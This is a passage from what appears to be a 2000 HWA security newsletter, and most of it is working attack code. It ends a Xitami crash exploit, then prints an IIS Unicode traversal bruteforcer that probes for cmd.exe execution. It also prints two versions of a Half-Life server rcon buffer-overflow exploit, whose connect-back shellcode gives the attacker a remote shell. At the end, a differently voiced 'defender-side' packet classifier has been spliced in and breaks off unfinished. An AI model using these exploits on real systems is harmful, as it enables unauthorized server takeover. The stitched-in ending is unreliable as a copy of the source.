"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\n\n"; get[1] = " Please stand by a while when rebooting the system...\n "; if (argc<2) { printf("Usage: ./xitami \n"); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); close(sock); while(count++ < 1) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } for(numin=0;numin < 1024;numin++) { get[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, get, sizeof(get),0); } } @HWA 331.0 [HWA] unicode M$ hack similar to those seen used recently by: Grazer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hwa-security.net http://hwa-security.net/hot.html Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases. /* HWA PRIVATE!!!!!! DO NOT DISTRIBUTE!!!!! 
 * ---------------------------------------------------------
 * NT iis Multi-language unicode scanner :)
 *
 * Idea by pr0ix - pr0ix@hwa-security.net
 * Code by grazer - grazer@hwa-security.net
 *
 * Greets to all hwa-members : Cruciphux, pr0ix, pyra
 * forrest^, FProphet, eth0^, WhiteRuss, PhantasmP, xtremist,
 * base2op....and all other cool people i forgot (sorry)
 *
 * Please do not use this tool for illegal purposes!
 * If you do we are not responsible!
 *
 * grazer
 *
 * RELEASED by Cruciphux http://hwa-security.net/
 * OCT 27 2000
 *
 */
#include
#include
#include
#include
#include

#define RETURN "../winnt/system32/cmd.exe?/c+dir\n\n"

main(int argc, char *argv[])
{
    int fd;
    struct sockaddr_in sin;
    struct in_addr addr;
    struct hostent *he;
    char not_found[] = "404";
    char recv_buffer[6024];
    char temp[3];
    char *try_to_find;
    int i;
    char char1, char3 = 'a';
    char char2, char4;
    char percent = '%';
    char charac1, charac2, charac3, charac4, procent;

    while(argc<2) {
        printf ("\n [----------------------------] \n");
        printf (" [ NT IIS Unicode BruteForcer ] \n");
        printf (" [----------------------------] \n");
        printf (" [ usage : unibrute ] \n");
        printf (" [ by : grazer ] \n\n");
        exit(0);
    }

    if ((he=gethostbyname(argv[1])) == NULL) {
        printf("\n [ Cannot Find Host!.. ] \n\n");
        exit(0);
    }

    printf("\n [ Starting NT Unicode Bruteforcer..]\n");

    for (char1='a'; char1<='z'; char1++) {
     for (char3= 'a'; char3<='z'; char3++) {
      for (char2='0'; char2<='9'; char2++) {
       for (char4='0'; char4<='9'; char4++) {
        char buffer[1024] = "GET /scripts/..";

        fd = socket(AF_INET, SOCK_STREAM, 0);
        bcopy(he->h_addr, (char *) &sin.sin_addr, he->h_length);
        sin.sin_family=AF_INET;
        sin.sin_port=htons(80);
        if(connect(fd, (struct sockaddr*)&sin, sizeof(sin))!=0) {
            printf ("\n [ Cannot Connect() to Host ] \n\n ");
            exit(0);
        }

        buffer[15] = percent;
        buffer[16] = char1;
        buffer[17] = char2;
        buffer[18] = percent;
        buffer[19] = char3;
        buffer[20] = char4;
        strcat(buffer, RETURN);

        fprintf(stdout, ".");
        send(fd, buffer, sizeof(buffer), 0);
        recv(fd, recv_buffer, sizeof(recv_buffer), 0);
        close(fd);
        bzero(buffer, sizeof(buffer));

        try_to_find = strstr(recv_buffer,not_found);
        while(try_to_find == NULL) {
            printf ("\n [ Server is Vulnerable !! ]\n");
            printf (" [ %c%c%c%c%c%c ]\n\n", percent, char1, char2, percent, char3 , char4);
            exit(0);
        }
       }
      }
     }
    }
    printf ("\n [ Sorry Nothing Found on Server.. ]\n");
}

@HWA

332.0 [HWA] Release: Hlds Half life server vuln by csh **
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

** This was also released in another form by csh and another security team; both versions of the code are included here with comments.

http://hwa-security.net
http://hwa-security.net/hot.html

Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases.

/* --- advisory here (vvvv) ---
   THIS IS A PRIVATE RELEASE - DO NOT DISTRIBUTE IT
 * distribution note:
 * released through hwa-security.net Oct 23 2000
 *
 * EFNet #hwa-security contact@hwa-security.net
 * posted by csh
 --- end of advisory ---

 ----- tmd info tag -----
 v HalfLife Dedicated Server (3.1.0.x)
 w october, 19th 2000
 a Thiago Zaninotti (thiago@sekure.org)
 a Gustavo Scotti (scotti@sekure.org)
 g Tamanduah Sekure Labs (http://tamandua.sekure.org)
 i do not run this behind a masquerade server.
the shellcode is a connect back i and it does probe for local address/port for buffer alignment. */ #include #include #include #include #include #include typedef unsigned long u32; typedef unsigned short u16; typedef unsigned char u8; /* shell code source code. jmp next back: popl %esi jmp start next: call back .string \"0123456789012345/bin/sh\" start: // now some adds to include the sockaddr stuff // fill in sin family xorl %eax, %eax incw %ax incw %ax movw %ax, (%esi) // FAMILY 2 = AF_INET xorl %ecx, %ecx movb $0x8, %cl movl %esi, %edi addl $0x8, %edi // now pad 0 sock_addr xorb %al, %al redo: movb %al, (%edi) incl %edi decl %ecx jnz redo // kernel socket buffer is allocated 0x20 after sockaddr // socket xorl %eax, %eax movl %eax, 0x28(%esi) // 0, TCP/IP incl %eax movl %eax, 0x24(%esi) // 1, SOCK_STREAM incl %eax movl %eax, 0x20(%esi) // 2, AF_INET leal 0x20(%esi), %ecx // params to socket syscall xorl %ebx, %ebx incl %ebx // ebx = 1 - function socket xor %eax, %eax addl $0x66, %eax // socket syscall int $0x80 // sycall int mov %eax, %edi // %edi is the socket descriptor // connect movl %eax, 0x20(%esi) // socket leal (%esi), %eax movl %eax, 0x24(%esi) // &sockaddr_in xorl %eax, %eax addl $0x10, %eax // sizeof(sockaddr_in) movl %eax, 0x28(%esi) leal 0x20(%esi), %ecx // params to socket syscall xorl %ebx, %ebx incl %ebx incl %ebx incl %ebx // ebx = 2 - function connect xorl %eax, %eax addl $0x66, %eax // socket syscall push %edi // save your socket descriptor int $0x80 // sycall int pop %edi // dup2 sock, 0 xorl %eax, %eax addl $0x3f, %eax movl %edi, %ebx xorl %ecx, %ecx int $0x80 // dup2 0, 1 xorl %eax, %eax addl $0x3f, %eax xorl %ebx, %ebx xorl %ecx, %ecx incl %ecx int $0x80 // dup2 0, 2 xorl %eax, %eax addl $0x3f, %eax xorl %ebx, %ebx xorl %ecx, %ecx incl %ecx incl %ecx int $0x80 // trivial shell-code movl %esi, %eax addl $0x18, %eax // endereco onde vai ficar ENVP movl %eax, 0x18(%esi) // *envp xorl %eax, %eax movb %al, 0x17(%esi) movl %eax, 0x1c(%esi) movb 
$0xb, %al leal 0x18(%esi), %ecx // params leal 0x1c(%esi), %edx // envp movl %esi, %ebx addl $0x10, %ebx int $0x80 xorl %eax, %eax incl %eax int $0x80 */ unsigned char shellcode[]= "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff.www.sekure.org." "\x2f\x62\x69\x6e\x2f" "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08" "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89" "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43" "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46" "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43" "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89" "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd" "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0" "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b" "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40" "\xcd\x80"; /* NET functions */ int udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size) { struct sockaddr_in server; int i,n; i = sizeof(server); n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i); *daddr = ntohl(server.sin_addr.s_addr); *port = ntohs(server.sin_port); return n; } int udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size) { struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons( port); server.sin_addr.s_addr = htonl( daddr); return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server)); } int udp_connect( u32 addr, u16 port) { struct sockaddr_in client; int new_fd; new_fd = socket( AF_INET, SOCK_DGRAM, 0); if (new_fd<0) return new_fd; bzero( (char *) &client, sizeof( client)); client.sin_family = AF_INET; client.sin_addr.s_addr = htonl( addr); client.sin_port = htons( port); if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0) return -1; /* cant bind local address */ return new_fd; } u32 dns2ip( u8 *host) { struct hostent *dns; 
u32 saddr; dns = gethostbyname( host); if (!dns) return 0xffffffff; bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length); return ntohl(saddr); } int async_read( int sock_r, int rettime) { fd_set fd_r; struct timeval tv; char try_ch[4]="/-\\|"; int r,j; for (r=0;r0) if (FD_ISSET(sock_r, &fd_r)) return sock_r; else return -1; } } return -1; } int get_server_info( int sock, u32 addr, u16 port) { u32 r_addr; u16 r_port; int n, i; u8 pkt[256], *str; pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf(&pkt[4], "details"); n = udp_send(sock, addr, port, pkt, strlen(pkt)); printf(". connecting to the server... "); fflush(stdout); if (async_read(sock, 6)<0) goto server_down; n = udp_read(sock, &addr, &port, pkt, sizeof(pkt)); if (n<0) { server_down: printf("\bserver down!\r*\n"); exit(0); } printf("\bdone\n"); str = &pkt[4]; str+=strlen(str)+1; printf("\t server_name [%s]\n", str); str+=strlen(str)+1; printf("\t map_name [%s]\n", str); str+=strlen(str)+1; str+=strlen(str)+1; printf("\t game_name [%s]\n", str); str+=strlen(str)+1; printf("\tusers_online [%d of %d]\n", str[0], str[1]); str+=3; printf("\t remote_OS [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? 
"linux" : "unknown"))); if (str[1]=='w') return 2; if (str[1]=='l') return 1; return 0; } u32 retrieve_local_info(int sock, u8 *host) { struct sockaddr_in server; int soclen; soclen = sizeof(server); if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0) { printf("* error in getsockname\n"); exit(0); } snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port)); return htonl(server.sin_addr.s_addr); } int bind_tcp( int *port) { struct sockaddr_in mask_addr; int sock, portno=25000; /* base_port */ sock = socket( AF_INET, SOCK_STREAM, 0); if (sock<0) return sock; redo: mask_addr.sin_family = AF_INET; mask_addr.sin_port = htons( portno); mask_addr.sin_addr.s_addr = 0; if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0) { error: portno++; if (portno>26000) { printf("* no TCP port to bind in.\n"); exit(0); } goto redo; } if (listen( sock, 0)<0) goto error; printf(". TCP listen port number %d\n", portno); *port = portno; return sock; } wait_for_connect(int sock) { fd_set fds; u8 tmp[256]; int tcp, addr_len; struct sockaddr_in server; printf(". waiting for connect_back shellcode response... "); if (async_read(sock, 40)!=sock) { printf("\bfailed!\r*\n"); exit(0); } tcp = accept( sock, (struct sockaddr *)&server, &addr_len); printf("\bconnected\n. ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port)); close(sock); /* closing incoming socket */ printf(". congratulations. you have owned this one.\n"); sprintf(tmp,"uname -a; id\n"); send(tcp, tmp, strlen(tmp), 0); /* basic async mode */ while (1) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(tcp, &fds); if (select(tcp+1, &fds, NULL, NULL, NULL)>0) { if (FD_ISSET(0, &fds)) { int n; n = read(0, tmp, 256); if (n<0) goto end_conn; if (write(tcp, tmp, n)!=n) goto end_conn; } if (FD_ISSET(tcp, &fds)) { int n; n = read(tcp, tmp, 256); if (n<0) goto end_conn; if (write(0, tmp, n)!=n) goto end_conn; } } } end_conn: close(tcp); printf(". bye-bye. 
Stay tuned for more Tamandua Sekure Labs codes.\n"); } assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo) { u8 pkt[2048], *shell_ptr; struct sockaddr_in *sc_server; u32 ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40; int i, n, tcp, tcp_port; printf(". localinfo %s\n", linfo); tcp = bind_tcp( &tcp_port); sc_server = (struct sockaddr_in *)&shellcode[10]; sc_server->sin_addr.s_addr = htonl(laddr); sc_server->sin_port = htons(tcp_port); last_byte-=strlen(linfo); pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf( &pkt[4], "rcon "); i = strlen(pkt); shell_ptr = &pkt[i]; /* find out how many nops we can push before shellcode */ n = last_byte - i - sizeof(shellcode)-1 - over_head; for (i=0;i * Gustavo Scotti (csh) * * Proof of concept - There is a remote exploitable buffer overflow * in Half Life server (3.1.0.x) for linux (HLDS). The problem is * related to the RCON command (Remote CONsole). * (port.) Existe um buffer overflow exploitavel no Half Life Server * (HLDS) relacionado ao comando RCON. * * After several tests, we found out the 'rcon' command is also vulnerable * to a format string attack which can lead to a remote exploitation. * (port) O comando RCON tambem e' vulneravel a um format string attack. * * YOU DO NOT NEED THE RCON PASSWORD TO EXPLOIT THIS VULNERABILITY, * which means any multiplayer server is vulnerable to the attack. * (port) Voce nao precisa de password para explorar esta vulnerabilidade, * o que significa que qualquer servidor e' vulneravel. * * Agradecimentos: Tamandua Sekure Labs - Fabio Ramos (framos@axur.org), * Eduardo Freitas, Marcos Sposito, Roberto Monteiro (casper), * Nelson Britto (stderr), Sabrina Monteiro, Gabriel Zaninotti e * Felipe Salum. A todos os leitores da Best of Security Brasil (BOS-BR). * * Respects: c_orb, el8.org (specially duke), meta, guys at core sdi, * the "infame" TOXYN.ORG (pt rocks) - r00t, pr0m, horizon, plaguez, * ratao and p.ulh.as/promisc.net crew. Greetz to AXUR.ORG too! 
guys at * sekure.org: vader, jamez, falcon and staff. * * WE DO NOT TAKE ANY RESPONSABILITY. DO NOT USE THIS CODE TO GAIN * UNAUTHORIZED ACCESS TO A REMOTE SERVER -- THIS IS NOT LEGAL. * * also thanks to botman (botman@mailandnews.com) and pudim. * Visit the brazilian security portal: http://www.securenet.com.br */ #include #include #include #include #include #include typedef unsigned long u32; typedef unsigned short u16; typedef unsigned char u8; unsigned char shellcode[]= "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff scotti@axur.org" "\x2f\x62\x69\x6e\x2f" "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08" "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89" "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43" "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46" "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43" "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89" "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd" "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0" "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b" "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40" "\xcd\x80"; /* NET functions */ int udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size) { struct sockaddr_in server; int i,n; i = sizeof(server); n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i); *daddr = ntohl(server.sin_addr.s_addr); *port = ntohs(server.sin_port); return n; } int udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size) { struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons( port); server.sin_addr.s_addr = htonl( daddr); return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server)); } int udp_connect( u32 addr, u16 port) { struct sockaddr_in client; int new_fd; new_fd = socket( AF_INET, SOCK_DGRAM, 0); if (new_fd<0) return new_fd; bzero( (char *) 
&client, sizeof( client)); client.sin_family = AF_INET; client.sin_addr.s_addr = htonl( addr); client.sin_port = htons( port); if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0) return -1; /* cant bind local address */ return new_fd; } u32 dns2ip( u8 *host) { struct hostent *dns; u32 saddr; dns = gethostbyname( host); if (!dns) return 0xffffffff; bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length); return ntohl(saddr); } int async_read( int sock_r, int rettime) { fd_set fd_r; struct timeval tv; char try_ch[4]="/-\\|"; int r,j; for (r=0;r0) if (FD_ISSET(sock_r, &fd_r)) return sock_r; else return -1; } } return -1; } int get_server_info( int sock, u32 addr, u16 port) { u32 r_addr; u16 r_port; int n, i; u8 pkt[256], *str; pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf(&pkt[4], "details"); n = udp_send(sock, addr, port, pkt, strlen(pkt)); printf(". connecting to the server... "); fflush(stdout); if (async_read(sock, 6)<0) goto server_down; n = udp_read(sock, &addr, &port, pkt, sizeof(pkt)); if (n<0) { server_down: printf("\bserver down!\r*\n"); exit(0); } printf("\bdone\n"); str = &pkt[4]; str+=strlen(str)+1; printf("\t server_name [%s]\n", str); str+=strlen(str)+1; printf("\t map_name [%s]\n", str); str+=strlen(str)+1; str+=strlen(str)+1; printf("\t game_name [%s]\n", str); str+=strlen(str)+1; printf("\tusers_online [%d of %d]\n", str[0], str[1]); str+=3; printf("\t remote_OS [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? 
"linux" : "unknown"))); if (str[1]=='w') return 2; if (str[1]=='l') return 1; return 0; } u32 retrieve_local_info(int sock, u8 *host) { struct sockaddr_in server; int soclen; soclen = sizeof(server); if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0) { printf("error in getsockname\n"); exit(0); } snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port)); return htonl(server.sin_addr.s_addr); } int bind_tcp( int *port) { struct sockaddr_in mask_addr; int sock, portno=25000; /* base_port */ sock = socket( AF_INET, SOCK_STREAM, 0); if (sock<0) return sock; redo: mask_addr.sin_family = AF_INET; mask_addr.sin_port = htons( portno); mask_addr.sin_addr.s_addr = 0; if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0) { error: portno++; if (portno>26000) { printf("* no TCP port to bind in.\n"); exit(0); } goto redo; } if (listen( sock, 0)<0) goto error; printf(". TCP listen port number %d\n", portno); *port = portno; return sock; } wait_for_connect(int sock) { fd_set fds; u8 tmp[256]; int tcp, addr_len; struct sockaddr_in server; printf(". waiting for connect_back shellcode responde... "); if (async_read(sock, 15)!=sock) { printf("\bfailed!\r*\n"); exit(0); } tcp = accept( sock, (struct sockaddr *)&server, &addr_len); printf("\bconnected\n. ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port)); close(sock); /* closing incoming socket */ printf(". congratulations. you have owned this one.\n"); /* basic async mode */ while (1) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(tcp, &fds); if (select(tcp+1, &fds, NULL, NULL, NULL)>0) { if (FD_ISSET(0, &fds)) { int n; n = read(0, tmp, 256); if (n<0) goto end_conn; if (write(tcp, tmp, n)!=n) goto end_conn; } if (FD_ISSET(tcp, &fds)) { int n; n = read(tcp, tmp, 256); if (n<0) goto end_conn; if (write(0, tmp, n)!=n) goto end_conn; } } } end_conn: close(tcp); printf(". bye-bye. 
Stay tuned for more Tamandua Sekure Labs codes.\n"); } assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo) { u8 pkt[2048], *shell_ptr; struct sockaddr_in *sc_server; u32 ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40; int i, n, tcp, tcp_port; printf(". localinfo %s\n", linfo); tcp = bind_tcp( &tcp_port); sc_server = (struct sockaddr_in *)&shellcode[10]; sc_server->sin_addr.s_addr = htonl(laddr); sc_server->sin_port = htons(tcp_port); last_byte-=strlen(linfo); pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff; sprintf( &pkt[4], "rcon "); i = strlen(pkt); shell_ptr = &pkt[i]; /* find out how many nops we can push before shellcode */ n = last_byte - i - sizeof(shellcode)-1 - over_head; for (i=0;i\n"); exit(-1); } main(int argc, char **argv) { u32 addr, laddr; u16 port; int sock, i; u8 linfo[256], *tmp = NULL; printf(". half-life 3.1.0.x remote buffer-overflow for linux x86\n"); printf(". (c)2000, Tamandua Sekure Laboratories\n"); printf(". Authors: Thiago Zaninotti & Gustavo Scotti\n"); if (argc<2) usage(); tmp = (u8 *)strchr(argv[1], ':'); if (tmp) { *tmp = 0; tmp++; port = atoi(tmp); } else { printf(": port not found, using default 27015\n"); port = 27015; } addr = dns2ip(argv[1]); if (addr==0xffffffff) { printf("host not found!\n"); exit(0); } sock = udp_connect( addr, port); laddr = retrieve_local_info(sock, linfo); if (get_server_info(sock, addr, port)!=1) { printf("this is not a linux server. Make a shellcode to it and have fun\n"); exit(0); } assembly_shell_code(sock, addr, port, laddr, linfo); } @HWA 333.0 [HWA] Release: trans0ft brokerftp vuln by eth0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hwa-security.net http://hwa-security.net/hot.html Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases. 
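The two HLDS releases above show the datagram layout the rcon overflow rides on: four 0xff bytes, then an ASCII command such as "details" or "rcon <password> <command>" on UDP 27015. As an added, defender-side example (not the zine's code and not the Tamandua/csh code), here is a classifier a server operator or IDS could run over inbound datagrams to flag rcon bodies that are oversized, binary, or carry printf-style directives; the 256-byte ceiling and the sample packets are constructed assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum hl_verdict {
    HL_NOT_HL = 0,      /* no 0xff 0xff 0xff 0xff out-of-band header */
    HL_QUERY,           /* ordinary query such as "details" */
    HL_RCON_OK,         /* "rcon ..." whose body has a plausible shape */
    HL_RCON_OVERSIZED,  /* rcon body far longer than any console command */
    HL_RCON_BINARY,     /* non-printable bytes in the body (NOP sled, shellcode) */
    HL_RCON_FORMAT      /* printf-style directives in the body */
};

/* Assumed ceiling for a legitimate "rcon <password> <command>" body; the
 * exploit above pushes roughly a kilobyte into the same field. */
#define HL_RCON_MAX_BODY 256

enum hl_verdict hl_classify(const unsigned char *pkt, size_t len)
{
    const unsigned char *body;
    size_t blen, i, directives = 0;
    int percent_n = 0;

    if (len < 4 || memcmp(pkt, "\xff\xff\xff\xff", 4) != 0)
        return HL_NOT_HL;
    body = pkt + 4;
    blen = len - 4;
    if (blen < 5 || memcmp(body, "rcon ", 5) != 0)
        return HL_QUERY;
    body += 5;
    blen -= 5;
    if (blen > HL_RCON_MAX_BODY)
        return HL_RCON_OVERSIZED;
    for (i = 0; i < blen; i++) {
        unsigned char c = body[i];
        if (c == '\n' || c == '\r' || c == '\t')
            continue;
        if (!isprint(c))
            return HL_RCON_BINARY;
        if (c == '%' && i + 1 < blen && body[i + 1] != '\0') {
            if (body[i + 1] == 'n')
                percent_n = 1;          /* a write primitive on its own */
            else if (strchr("sxXdpu", body[i + 1]) != NULL)
                directives++;           /* stack-walking pattern when repeated */
        }
    }
    return (percent_n || directives >= 3) ? HL_RCON_FORMAT : HL_RCON_OK;
}

/* Wrapper for NUL-terminated sample datagrams. */
enum hl_verdict hl_classify_cstr(const char *s)
{
    return hl_classify((const unsigned char *)s, strlen(s));
}

const char *hl_verdict_name(enum hl_verdict v)
{
    static const char *names[] = { "not-halflife", "query", "rcon-ok",
                                   "rcon-oversized", "rcon-binary", "rcon-format" };
    return names[v];
}

/* Runs the classifier over constructed sample datagrams (not captured
 * traffic) and returns how many were flagged, i.e. anything past HL_RCON_OK. */
int hl_demo(void)
{
    static const char *samples[] = {
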